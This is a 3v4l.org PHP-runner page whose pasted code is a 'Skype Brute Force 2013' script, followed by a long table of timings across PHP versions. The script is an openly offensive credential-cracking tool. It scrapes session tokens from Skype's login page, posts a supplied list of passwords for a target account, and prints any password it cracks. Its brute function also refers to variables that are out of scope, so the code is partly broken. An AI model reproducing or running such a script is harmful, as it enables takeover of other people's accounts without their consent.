3v4l.org

run code in 300+ PHP versions simultaneously
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> <? @set_time_limit(0); # Brute Force Skype PHP Version # Coded By : xSecurity # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM )) $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"; # Username & Password $username = $_POST['duedipicca']; $password = explode("\r\n", $_POST['passwords']); # time zone $time = date_default_timezone_set("Asia/Riyadh"); $date = date('H:i:s'); //Returns IST # header $header = "HTTP/1.1 302"; # Fucntion Detalis function xsecurity($skype) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $run = curl_exec($ch); preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash); preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie); preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm); return $hash[1]."|:|".$piie[1]."|:|".$etmm[1]; } # Explode Detalis $xsec = explode("|:|" ,xsecurity($skype)); $token = $xsec[0]; $pie = $xsec[1]; $etm = $xsec[2]; # Function Brute function brute($skype,$username,$pass,$header) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $brute = curl_exec($ch); if(strstr($brute, $header)) { echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>"; } return $brute; } if($_POST['brute']) { foreach($password as $pass) { brute($skype,$username,$pass,$header); } } echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : archavin cyberizm.org</font></center>"; ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.60.0070.00716.38
8.3.50.0080.01121.02
8.3.40.0110.00418.67
8.3.30.0040.01218.59
8.3.20.0000.00720.20
8.3.10.0090.00021.72
8.3.00.0060.00317.68
8.2.180.0070.01118.26
8.2.170.0040.01122.96
8.2.160.0070.00720.44
8.2.150.0050.00324.18
8.2.140.0050.00324.66
8.2.130.0040.00426.16
8.2.120.0030.00617.60
8.2.110.0040.00822.13
8.2.100.0070.00417.80
8.2.90.0030.00519.23
8.2.80.0040.00417.97
8.2.70.0050.00317.38
8.2.60.0000.00817.80
8.2.50.0050.00318.07
8.2.40.0070.00419.47
8.2.30.0070.00020.54
8.2.20.0040.00417.46
8.2.10.0040.00417.98
8.2.00.0000.00817.93
8.1.280.0130.00725.92
8.1.270.0090.00020.48
8.1.260.0080.00026.35
8.1.250.0070.00028.09
8.1.240.0040.00422.57
8.1.230.0040.00719.01
8.1.220.0040.00417.74
8.1.210.0040.00418.77
8.1.200.0030.00617.35
8.1.190.0090.00017.10
8.1.180.0050.00318.10
8.1.170.0000.00820.28
8.1.160.0000.00721.96
8.1.150.0040.00418.75
8.1.140.0030.00521.34
8.1.130.0000.00717.56
8.1.120.0030.00417.29
8.1.110.0000.00717.33
8.1.100.0030.00317.38
8.1.90.0030.00317.36
8.1.80.0030.00917.15
8.1.70.0000.00817.30
8.1.60.0000.00717.44
8.1.50.0080.00017.27
8.1.40.0000.00817.39
8.1.30.0000.00817.54
8.1.20.0000.00717.52
8.1.10.0000.00817.33
8.1.00.0050.00217.34
8.0.300.0090.00218.77
8.0.290.0030.00516.58
8.0.280.0000.00718.43
8.0.270.0000.00817.25
8.0.260.0030.00317.18
8.0.250.0040.00416.74
8.0.240.0040.00416.81
8.0.230.0000.00716.82
8.0.220.0040.00416.78
8.0.210.0000.00816.59
8.0.200.0040.00416.67
8.0.190.0000.00816.86
8.0.180.0040.00416.77
8.0.170.0000.00716.76
8.0.160.0050.00216.79
8.0.150.0000.00716.58
8.0.140.0000.00716.68
8.0.130.0030.00313.45
8.0.120.0000.00716.69
8.0.110.0040.00416.79
8.0.100.0040.00416.82
8.0.90.0040.00416.54
8.0.80.0030.01216.75
8.0.70.0050.00216.82
8.0.60.0000.00716.64
8.0.50.0000.00816.61
8.0.30.0100.00716.88
8.0.20.0120.00917.40
8.0.10.0000.00816.75
8.0.00.0070.01116.75
7.4.330.0000.00515.21
7.4.320.0030.00316.45
7.4.300.0040.00416.47
7.4.290.0070.00016.48
7.4.280.0040.00416.39
7.4.270.0040.00416.46
7.4.260.0030.00316.53
7.4.250.0040.00416.41
7.4.240.0050.00216.43
7.4.230.0030.00316.25
7.4.220.0090.00916.55
7.4.210.0110.00316.31
7.4.200.0030.00316.49
7.4.160.0070.00716.32
7.4.150.0250.00017.40
7.4.140.0100.01017.86
7.4.130.0110.00816.32
7.4.120.0140.00516.32
7.4.110.0160.00816.37
7.4.100.0100.00716.38
7.4.90.0100.00716.38
7.4.80.0140.00919.39
7.4.70.0070.01116.35
7.4.60.0120.01216.49
7.4.50.0080.00016.17
7.4.40.0130.00316.38
7.4.30.0160.00616.48
7.4.00.0070.01014.74
7.3.330.0030.00313.54
7.3.320.0040.00313.46
7.3.310.0000.00715.98
7.3.300.0030.00316.16
7.3.290.0070.00916.15
7.3.280.0120.00616.10
7.3.270.0070.01017.40
7.3.260.0070.01016.36
7.3.250.0120.00516.16
7.3.240.0050.01816.34
7.3.230.0110.00716.52
7.3.210.0100.00716.33
7.3.200.0000.01716.42
7.3.190.0070.00716.20
7.3.180.0070.01016.17
7.3.170.0090.01216.27
7.3.160.0120.00616.47
7.3.10.0150.00716.43
7.3.00.0110.01116.54
7.2.330.0060.01216.59
7.2.320.0060.01016.31
7.2.310.0080.00816.29
7.2.300.0070.01016.54
7.2.290.0140.00316.38
7.2.130.0090.01416.41
7.2.120.0180.00916.47
7.2.110.0070.01116.36
7.2.100.0100.01016.74
7.2.90.0110.01417.02
7.2.80.0000.01516.41
7.2.70.0100.00716.84
7.2.60.0110.01116.84
7.2.50.0000.01516.71
7.2.40.0170.00716.98
7.2.30.0030.01316.80
7.2.20.0060.00916.62
7.2.10.0040.01316.61
7.2.00.0040.01018.44
7.1.250.0000.01515.75
7.1.200.0070.00715.73
7.1.100.0030.01018.50
7.1.70.0030.00917.46
7.1.60.0070.01419.50
7.1.50.0030.01717.11
7.1.00.0070.07322.42
7.0.200.0000.01017.07
7.0.80.0070.04720.02
7.0.70.0000.05720.01
7.0.60.0100.03319.83
7.0.50.0070.04720.30
7.0.40.0000.04320.04
7.0.30.0000.04720.13
7.0.20.0030.04020.17
7.0.10.0130.06720.16
7.0.00.0030.09020.14
5.6.280.0000.03721.05
5.6.230.0030.07320.68
5.6.220.0100.03320.67
5.6.210.0030.05020.50
5.6.200.0100.04021.13
5.6.190.0100.03720.98
5.6.180.0230.02021.14
5.6.170.0100.03721.05
5.6.160.0200.06321.08
5.6.150.0100.05021.09
5.6.140.0030.07321.03
5.6.130.0070.07720.98
5.6.120.0100.08021.06
5.6.110.0130.08021.01
5.6.100.0070.06021.20
5.6.90.0070.08321.01
5.6.80.0100.05320.43
5.6.70.0070.07720.36
5.6.60.0070.08320.46
5.6.50.0030.08720.45
5.6.40.0030.08020.39
5.6.30.0070.05020.41
5.6.20.0070.05020.46
5.6.10.0030.08320.44
5.6.00.0030.08320.41
5.5.370.0000.04020.59
5.5.360.0000.04320.51
5.5.350.0000.04020.50
5.5.340.0030.04020.87
5.5.330.0000.04320.94
5.5.320.0000.05720.90
5.5.310.0030.04020.90
5.5.300.0070.07020.91
5.5.290.0170.07720.82
5.5.280.0030.09320.96
5.5.270.0000.08720.82
5.5.260.0070.06720.90
5.5.250.0000.04720.60
5.5.240.0000.05020.30
5.5.230.0130.08020.29
5.5.220.0070.08720.31
5.5.210.0130.07320.28
5.5.200.0070.07720.02
5.5.190.0000.05320.15
5.5.180.0070.04720.24
5.5.160.0030.04720.29
5.5.150.0030.04020.14
5.5.140.0100.08020.29
5.5.130.0030.04720.29
5.5.120.0130.03720.17
5.5.110.0100.08020.20
5.5.100.0130.04720.18
5.5.90.0100.06020.19
5.5.80.0100.08020.16
5.5.70.0000.08320.18
5.5.60.0100.07020.09
5.5.50.0130.07020.09
5.5.40.0030.08320.16
5.5.30.0070.08019.98
5.5.20.0070.08020.08
5.5.10.0030.05320.06
5.5.00.0100.07720.06
5.4.450.0170.07319.36
5.4.440.0000.05019.21
5.4.430.0100.08319.17
5.4.420.0100.05019.45
5.4.410.0230.06019.40
5.4.400.0030.06019.17
5.4.390.0030.08319.14
5.4.380.0100.07318.95
5.4.370.0030.06019.05
5.4.360.0130.07018.85
5.4.350.0070.04718.88
5.4.340.0030.05719.23
5.4.320.0030.04719.16
5.4.310.0070.04019.12
5.4.300.0100.07719.20
5.4.290.0030.06019.14
5.4.280.0000.08718.90
5.4.270.0100.04319.12
5.4.260.0130.07319.03
5.4.250.0070.07319.15
5.4.240.0130.05718.96
5.4.230.0070.04319.04
5.4.220.0170.05718.89
5.4.210.0100.07319.09
5.4.200.0100.07319.13
5.4.190.0100.03719.03
5.4.180.0130.07318.86
5.4.170.0000.06719.23
5.4.160.0100.07718.89
5.4.150.0000.06319.01
5.4.140.0170.06716.41
5.4.130.0030.07316.39
5.4.120.0130.06716.46
5.4.110.0070.04316.48
5.4.100.0070.07316.56
5.4.90.0070.07016.41
5.4.80.0070.07316.39
5.4.70.0030.07316.46
5.4.60.0030.05316.27
5.4.50.0070.04016.45
5.4.40.0000.07716.49
5.4.30.0100.07016.45
5.4.20.0070.07716.47
5.4.10.0070.03716.31
5.4.00.0000.03715.91
5.3.290.0130.05714.64
5.3.280.0070.03714.59
5.3.270.0070.07714.56
5.3.260.0030.05714.58
5.3.250.0170.06714.59
5.3.240.0070.07314.59
5.3.230.0070.06314.58
5.3.220.0100.05014.51
5.3.210.0130.06714.55
5.3.200.0130.07014.55
5.3.190.0100.07714.40
5.3.180.0030.05314.52
5.3.170.0130.07014.55
5.3.160.0070.08014.41
5.3.150.0000.08014.41
5.3.140.0070.07314.38
5.3.130.0070.06314.40
5.3.120.0000.08314.52
5.3.110.0070.07314.40
5.3.100.0030.08013.98
5.3.90.0070.07313.88
5.3.80.0100.06013.99
5.3.70.0070.06713.95
5.3.60.0030.07013.98
5.3.50.0100.06313.89
5.3.40.0070.06713.90
5.3.30.0070.07013.90
5.3.20.0000.08013.54
5.3.10.0130.06313.43
5.3.00.0130.06713.61
5.2.170.0030.05710.96
5.2.160.0030.05311.09
5.2.150.0070.04311.13
5.2.140.0030.05711.01
5.2.130.0030.05011.05
5.2.120.0100.05711.12
5.2.110.0070.06011.17
5.2.100.0070.03010.89
5.2.90.0000.03310.94
5.2.80.0030.06311.06
5.2.70.0070.06010.89
5.2.60.0000.06711.05
5.2.50.0070.06311.02
5.2.40.0070.05311.05
5.2.30.0030.03711.03
5.2.20.0070.05711.01
5.2.10.0030.04710.92
5.2.00.0030.05710.74
5.1.60.0070.0539.99
5.1.50.0070.05010.06
5.1.40.0070.0479.99
5.1.30.0030.05710.23
5.1.20.0070.04710.43
5.1.10.0100.04710.12
5.1.00.0030.04010.06
5.0.50.0000.0378.58
5.0.40.0070.0278.25
5.0.30.0000.0708.29
5.0.20.0030.0478.20
5.0.10.0030.0408.02
5.0.00.0030.0678.02
4.4.90.0030.0337.39
4.4.80.0030.0337.39
4.4.70.0070.0337.39
4.4.60.0070.0277.39
4.4.50.0000.0207.39
4.4.40.0000.0577.39
4.4.30.0030.0337.39
4.4.20.0070.0337.39
4.4.10.0000.0337.39
4.4.00.0070.0477.39
4.3.110.0000.0377.39
4.3.100.0030.0377.39
4.3.90.0000.0337.39
4.3.80.0000.0507.39
4.3.70.0030.0407.39
4.3.60.0000.0377.39
4.3.50.0000.0207.39
4.3.40.0000.0477.39
4.3.30.0000.0337.39
4.3.20.0000.0377.39
4.3.10.0000.0177.39
4.3.00.0070.0307.39

preferences:
42.85 ms | 401 KiB | 5 Q